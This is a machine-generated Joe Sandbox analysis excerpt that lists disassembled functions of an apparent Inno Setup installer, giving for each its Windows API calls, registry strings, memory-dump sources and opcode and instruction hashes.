                                                                                • Opcode Fuzzy Hash: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                • Instruction Fuzzy Hash: 44B092A060074086DB40B7A298D262B28269740319B20843BB0CC9BA95EB3E88240B9F
                                                                                APIs
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID:
                                                                                • API String ID: 2574300362-0
                                                                                • Opcode ID: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                                                • Opcode Fuzzy Hash: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
                                                                                APIs
                                                                                • GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
                                                                                • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
                                                                                • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Append$System
                                                                                • String ID:
                                                                                • API String ID: 1489644407-0
                                                                                • Opcode ID: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                • Instruction ID: 44f8b16540ed1c6eecf525242fd074403e334eda66194076213ef08da8c10300
                                                                                • Opcode Fuzzy Hash: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                • Instruction Fuzzy Hash: 3431D4307043441AD721FB769C82BAE3A989F15318F54483FF901AB2E3CA7CAD09879D
                                                                                APIs
                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
                                                                                • TranslateMessage.USER32(?), ref: 0042448F
                                                                                • DispatchMessageA.USER32(?), ref: 00424499
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Message$DispatchPeekTranslate
                                                                                • String ID:
                                                                                • API String ID: 4217535847-0
                                                                                • Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                • Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
                                                                                • Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                • Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
                                                                                APIs
                                                                                • SetPropA.USER32(00000000,00000000), ref: 0041666A
                                                                                • SetPropA.USER32(00000000,00000000), ref: 0041667F
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Prop$Window
                                                                                • String ID:
                                                                                • API String ID: 3363284559-0
                                                                                • Opcode ID: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                • Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
                                                                                • Opcode Fuzzy Hash: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                • Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 0041EE64
                                                                                • IsWindowEnabled.USER32(?), ref: 0041EE6E
                                                                                • EnableWindow.USER32(?,00000000), ref: 0041EE94
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$EnableEnabledVisible
                                                                                • String ID:
                                                                                • API String ID: 3234591441-0
                                                                                • Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                • Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
                                                                                • Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                • Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
                                                                                APIs
                                                                                • SetActiveWindow.USER32(?), ref: 0046A02D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ActiveWindow
                                                                                • String ID: PrepareToInstall
                                                                                • API String ID: 2558294473-1101760603
                                                                                • Opcode ID: 75512e466bef58792cd12b8f356129037ecdd83b0312336bfaeea67d77f2dd49
                                                                                • Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
                                                                                • Opcode Fuzzy Hash: 75512e466bef58792cd12b8f356129037ecdd83b0312336bfaeea67d77f2dd49
                                                                                • Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: /:*?"<>|
                                                                                • API String ID: 0-4078764451
                                                                                • Opcode ID: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                • Instruction ID: 6c3526c54916fe71946563460b5bd12015a165326d65a32731909bc5939f884d
                                                                                • Opcode Fuzzy Hash: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                • Instruction Fuzzy Hash: CF71C370A40215BADB10E766DCD2FEE7BA19F05308F148067F580BB292E779AD458B4E
                                                                                APIs
                                                                                • SetActiveWindow.USER32(?), ref: 00482676
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ActiveWindow
                                                                                • String ID: InitializeWizard
                                                                                • API String ID: 2558294473-2356795471
                                                                                • Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                • Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
                                                                                • Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                • Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                • API String ID: 47109696-1019749484
                                                                                • Opcode ID: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                • Instruction ID: acdf9366f140fa0c09696ff4b806567a5b27613a006b44f2785fa8682630d216
                                                                                • Opcode Fuzzy Hash: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                • Instruction Fuzzy Hash: 6CF0823170052477DA00A65E6C82B9FA79D8B84758F60403FF508DB242EABAEE0243EC
                                                                                APIs
                                                                                • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                Strings
                                                                                • Inno Setup: Setup Version, xrefs: 0046EE65
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: Inno Setup: Setup Version
                                                                                • API String ID: 3702945584-4166306022
                                                                                • Opcode ID: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                • Instruction ID: 37dbbd71146fd60ed96ba35b84ff74d599aeccd68d0f9eb37ee109455dfe34ad
                                                                                • Opcode Fuzzy Hash: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                • Instruction Fuzzy Hash: B1E06D753012043FE710AA2B9C85F5BBADCDF88365F10403AB908DB392D578DD0181A9
                                                                                APIs
                                                                                • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: NoModify
                                                                                • API String ID: 3702945584-1699962838
                                                                                • Opcode ID: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                • Instruction ID: 84621f748531697c6bb4a8e0450a59e651a2caf9945441e4ffcb8bd5fa838dfd
                                                                                • Opcode Fuzzy Hash: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                • Instruction Fuzzy Hash: F6E04FB4640308BFEB04DB55CD4AF6B77ECDB48714F10405ABA049B281E674FE00C669
                                                                                APIs
                                                                                • GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
                                                                                  • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
                                                                                  • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
                                                                                  • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
                                                                                • SendNotifyMessageA.USER32(0002047E,00000496,00002711,-00000001), ref: 0047E6BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: EnumFontsMessageNotifyReleaseSend
                                                                                • String ID:
                                                                                • API String ID: 2649214853-0
                                                                                • Opcode ID: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                • Instruction ID: a62c935d52da393e7312112ce75ddb0898731394ffd2a16b1d4fc3e518f8127d
                                                                                • Opcode Fuzzy Hash: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                • Instruction Fuzzy Hash: 5B5195746001049BC710FF67E98169A37E5EB58308B90C67BA8049B3A6DB3CED45CB9D
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
                                                                                  • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMetricsMultiSystemWide
                                                                                • String ID: /G
                                                                                • API String ID: 224039744-2088674125
                                                                                • Opcode ID: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                • Instruction ID: 84c81a41a939c89cd5cf89585cf0d961f9543ff151f38a86aad590f5673b43e0
                                                                                • Opcode Fuzzy Hash: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                • Instruction Fuzzy Hash: 53518070A04215AFDB21DF55D8C4FAA7BB8EF64318F118077E404AB3A1C778AE45CB99
                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                                                  • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                  • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                  • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                  • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                • String ID:
                                                                                • API String ID: 296031713-0
                                                                                • Opcode ID: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                • Instruction ID: 30adadd309813d1a6846ca6b4958dbaac508113c784b73a5bb8d11bfdb372a30
                                                                                • Opcode Fuzzy Hash: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                • Instruction Fuzzy Hash: 3941E3B2E00304DFDB10CF69EE8521A77A4F7A8324B15417FD854A77E2D3789801DB88
                                                                                APIs
                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                                                • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseEnum
                                                                                • String ID:
                                                                                • API String ID: 2818636725-0
                                                                                • Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                                                • Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                                                • GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 2919029540-0
                                                                                • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                                                • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
                                                                                APIs
                                                                                • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                                                • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindFree
                                                                                • String ID:
                                                                                • API String ID: 4097029671-0
                                                                                • Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
